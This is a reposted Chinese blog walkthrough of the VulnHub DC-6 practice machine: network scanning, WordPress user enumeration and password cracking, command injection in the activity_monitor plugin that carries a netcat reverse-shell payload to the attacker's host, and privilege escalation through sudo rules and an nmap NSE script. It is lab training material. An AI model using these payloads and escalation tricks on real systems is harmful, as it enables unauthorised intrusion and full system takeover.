2021-08-22dc6靶机实战wp插件漏洞利用+suid提权+rockyou+sudo -l换命令写shell+nmap运行nse提权(转)

最新推荐文章于 2023-10-06 22:11:24 发布
最新推荐文章于 2023-10-06 22:11:24 发布
阅读量726 收藏 2
点赞数
分类专栏: 靶机练习
原文链接:https://blog.csdn.net/weixin_41082546/article/details/99192403
版权

 

靶场下载链接:

Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( Magnet)

0x01 环境搭建

直接使用VMware 或者 virtulbox 打开指定路径会自动导入,由于作者默认设置的是桥接模式,我们手动改为nat 模式即可。

0x02 主机发现

由于主机ip未知,首先我们应该考虑获得目标的ip地址,思路就是使用arp去发现内网存活主机,从而确定目标主机ip为192.168.88.184。

root@kali:~# netdiscover -i eth0 -r 192.168.88.1/24

0x03 端口探测

直接使用nmap进行端口探测,发现开放了两个端口22(ssh)、80(http)

Did not follow redirect to http://wordy/ 其中 web 服务被重定向到 http://wordy/

此时我们要么准备字典爆破ssh,要么通过web进行渗透。我们先来渗透web吧

0x04 访问web服务

由于web服务被重定向到http://wordy/ ,我们可以本地添加域名到主机文件,这样以后我们访问http://wordy/ 就相当于访问对应的ip地址。添加完域名及对应ip后,可以发现已经能够访问http://wordy/

访问 http://wordy/ ,可以看到是一个wordpress的网站。

0x05 漏洞扫描

使用wordpress漏洞测试工具wpscan进行网站漏洞探测,wpscan是一款针对wordpress的黑盒漏洞扫描器,可以获得包括版本、主体、插件等信息。

git clone https://github.com/wpscanteam/wpscan.git kali自带的wpscan数据库升级不了,所以我又重装了一个。

wpscan –url http://wordy –enumerate vp –enumerate vt –enumerate u

–enumerate u 枚举用户

–enumerate p 扫描安装的插件

–enumerate vp 扫描目标插件中的安全漏洞

–enumerate t 扫描主题

–enumerate vt 扫描主题中存在的漏洞

–enumerate tt 扫描文件漏洞

扫描结果

链接信息:

[+] http://wordy/

| Interesting Entry: Server: Apache/2.4.25 (Debian)

[+] http://wordy/xmlrpc.php

[+] http://wordy/readme.html

[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/

[+] http://wordy/wp-cron.php

版本信息:

[+] WordPress version 5.1.1 identified (Latest, released on 2019-03-13).

| Detected By: Rss Generator (Passive Detection)

主题信息:

[+] WordPress theme in use: twentyseventeen

| Location: http://wordy/wp-content/themes/twentyseventeen/

| Last Updated: 2019-05-07T00:00:00.000Z

用户枚举:

[i] User(s) Identified:

[+] admin

[+] graham

[+] mark

[+] sarah

[+] jens

0x05 利用已知信息登录系统

生成用户字典和密码

cat rockyou.txt | grep k01 > k01.txt 生成密码字典

./wpscan –url http://wordy/ –passwords /usr/share/wordlists/k01.txt –usernames /root/wp.txt

我们获得了Username: mark, Password: helpdesk01

我们使用获得的密码登录http://wordy/wp-admin/

可以看到安装了activity_monitor插件。

ok,我们去搜索activity_monitor插件相关漏洞。

0x06 漏洞利用

查看描述,通过替换ip、端口可以反弹shell

替换为如下格式即可:

nc -lvvp 333 我们在本机监听333端口

并且开启一个简单的临时的web服务,去访问45274.html 来触发漏洞

python -m SimpleHTTPServer 8080

访问web服务,发送google.fr| nc 192.168.88.183 333 -e /bin/bash给目标

成功接收到目标反弹回来的shell

也可以访问http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools输入ip,点击lookup,通过抓包修改ip参数的值为baidu.com | nc -e /bin/bash 192.168.88.183 333

 

进⼀步执⾏如下指令获取完整的shell:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

通过⽬录查看,发现在/home/mark/stuff⽬录下存在thing-to-do.txt⽂件,其内容为:

可以看到偶一个用户名和密码: graham – GSo7isUM1D4,由于系统开启了ssh,我们可以尝试进行登录一下:

OK,登录成功了!

0x07 权限提升

我们使用graham成功登录了目标系统。

使用sudo -l 查看目前用户可以执行的操作,发现我们可以运行jens用户下面的backups.sh。查看其内容是对web进行打包备份的。

#!/bin/bash

tar -czf backups.tar.gz /var/www/html

我们可以将解压命令删除,替换成/bin/bash,以jens用户去执行该脚本

此时我们已经是jens用户了,我们继续执行sudo -l 命令去查找我们可以进行的操作。

NOPASSWD: /usr/bin/nmap,jens用户可以在无需输入密码的情况下使用nmap,我们继续使用nmap去调用我们的脚本例如/bin/bash.

echo “os.execute(‘/bin/bash’)” > /tmp/root.nse

sudo nmap –script=/tmp/root.nse

通过nmap运行该脚本我们成功进入root用户。

热热的雨夜
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
shell-wp-update:一个非常简单的 shell 脚本,用于更新 WordPress 站点及其所有插件
07-09
目的 这将简单地将 wordpress 站点及其所有插件更新到最新版本,而无需检查数据库、域名或 wp-config.php 文件。 如果您使用版本控制管理站点并希望在上线之前检查更改,则非常适合使用。 如何使用 克隆这个项目并cd进去。 使脚本可执行: chmod +x update-wp.sh 做./update-wp.sh ../my-site/ 。 请注意,此路径应该是 wordpress 站点的根目录。 检查更新! 您可能需要通过访问/wp-admin/upgrade.php?step=1来更新数据库。 默认情况下,脚本将忽略: /wp-内容/ .*(任何隐藏文件) /wp-config.php .gitignore 文件中的任何内容。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
wordpress php执行短代码_【漏洞通告】PHP远程代码执行漏洞(CVE-2019-11043)
weixin_39742568的博客
11-23 135
1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年9月26日,PHP官方发布漏洞通告,其中指出:使用 Nginx + php-fpm的服务器,在部分配置下,存在远程代码执行漏洞.且该配置已被广泛使用,危害较大,影响较为广泛。...
/wp-cron.php_通过CRON / PHP快速检测被黑客入侵的文件:SuperScan
culi4814的博客
08-24 615
/wp-cron.php As a Certified Ethical Hacker, I'm fully aware that prevention is the best tactic to prevent hackers but, should one break through, the sooner you know it, the quicker you can act to limi...
vulnhub靶场,SYMFONOS: 1
kukudeshuo的博客
09-03 868
vulnhub靶场,SYMFONOS: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/symfonos-1,322/ 攻击机:kali(192.168.109.128) 靶机:SYMFONOS: 1(192.168.109.174) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.174 使用nmap扫描查看目
wpcron.php 病毒,wp-cron.php
weixin_34542865的博客
04-09 584
/*** A pseudo-cron daemon for scheduling WordPress tasks.** WP-Cron is triggered when the site receives a visit. In the scenario* where a site may not receive enough visits to execute scheduled tasks*...
HTB_Ignition靶机之登录框弱口令
网络安全学习
05-02 426
慢就是快 日常收集 日常 A 扫描,直接贴一下结果吧,访问 IP 重定向到 ignition.htb 这个东西 80/tcp open http nginx 1.14.2 |_http-title: Did not follow redirect to http://ignition.htb/ |_http-server-header: nginx/1.14.2 无法访问,还是和上一篇一样改一下 hosts 也是很简单的页面,LUMA 是一个网站模板,在最底端可以看到如下字样 Copyrig.
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1638
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
【msf】msf渗透wordpress博客学习
qq_20410657的博客
10-06 338
安装wordpress的web端因为版本问题有可能存在漏洞,以下是一个简单的web漏洞渗透过程。wpscan主要用于wordpress博客网站的漏洞。wordpress网址。
Vulnhub DC-2靶机渗透攻击过程演练
zhongxj183的博客
01-04 2931
Vulnhub DC-2靶机渗透攻击过程演练 DC-2介绍 与DC-1相同,DC-2靶机也有5个flag,需要注意的是,要添加host才能访问DC-2的web 环境准备 下载DC-2靶机导入VMware,选择和Kali同一网络适配器,DHCP获取IP即可 渗透过程 信息收集 扫描存活主机,得到目标靶机的IP nmap -sP 192.168.64.0/24 扫描端口,初步收集信息 nmap -T4 -sC -sV 192.168.64.128 添加host,访问web测试 主页上可以看到
Vulnhub靶场渗透测试系列DC-6(WordPress的activity monitor插件漏洞)
qq_45722813的博客
12-07 746
Vulnhub靶场渗透测试系列DC-6 下载地址:https://www.vulnhub.com/entry/dc-6,315/ 将下载好的靶机导入到VMware中,修改网络模式为NAT模式,开启靶机虚拟机 在kali机使用命令nmap -Pn 192.168.172.1/24主机发现,获取靶机IP地址 ...
[CTF challenge] DC-2
OUTOFTEN的博客
01-31 505
点击下载靶机 环境:vm虚拟机、kali 2019.4、桥接网络模式。 kali开机,dc-1开机。 step1.在kali中打开终端输入ifconfig命令查看自己在的网段 step2.老规矩,用nmap扫描一下自己网段内的主机,发现靶机。这里需要注意的是“Did not follow redirect to http://dc-2/”这里有个重定向的问题,这时,直接通过IP地址访问靶机...
【甄选靶场】Vulnhub百个项目渗透——项目三十二:DC-6(WP插件漏洞,跳板,二进制提权
人间体佐菲的博客
10-05 713
【甄选靶场】Vulnhub百个项目渗透——项目三十二:DC-6(WP插件漏洞,跳板,二进制提权
wordpress保护wp-login.phpwp-cron.php
若是凉夜已成梦
10-08 3500
禁止访问/wp-admin/install.phplocation ~ ^/wp-admin/install\.php { deny all; log_not_found off; access_log off; }``` 禁止外部访问wp-config.php location ~ ^/wp-cron.php { allow 127.0.0.1;#本地IP
wp cron.php,wordpress定时任务(wp-cron.php)造成主机CPU比较高的解决办法
weixin_39678163的博客
03-10 252
这两天网站CPU天天100+的,过一会就挂了,原来是wp-cron.php文件造成的。wordpress的定时任务功能我们还是经常要用到的,例如wordpress的定时备份,定时发布文章等都需要用到wordpress的定时任务功能,而在wordpress中,是靠wp-cron.php来实现这些功能的。但是昨天本人网站就出现CPU严重超标的情况,导致被主机商停机,好不容易联系上客服,被告知是由于wp...
wpscan update
最新发布
01-08
wpscan是一个WordPress漏洞扫描工具,它能够帮助网站管理员发现并修复WordPress网站的安全漏洞wpscan不断更新漏洞数据库和扫描算法,以确保能够及时发现最新的安全风险。对于wpscan的更新,有以下几个方面需要注意。 首先,wpscan更新会包括漏洞数据库的更新。随着新的漏洞被发现并报告,wpscan团队会不断更新漏洞数据库,以确保用户能及时获取到最新的漏洞信息。这样一来,网站管理员就能够及时了解到哪些安全漏洞可能存在于他们的WordPress网站中。 其次,wpscan更新还可能包括扫描算法的改进。随着技术的发展和安全威胁的不断演变,wpscan团队会对其扫描算法进行改进,以确保能够更准确地发现并报告潜在的安全风险。这样一来,用户就能够更放心地使用wpscan来保护其WordPress网站的安全。 总的来说,wpscan的更新对于用户来说非常重要。用户需要定期检查自己使用的wpscan版本,以确保其能够及时获取到最新的漏洞数据库和扫描算法。只有保持最新的版本,用户才能够最大限度地保护其WordPress网站的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值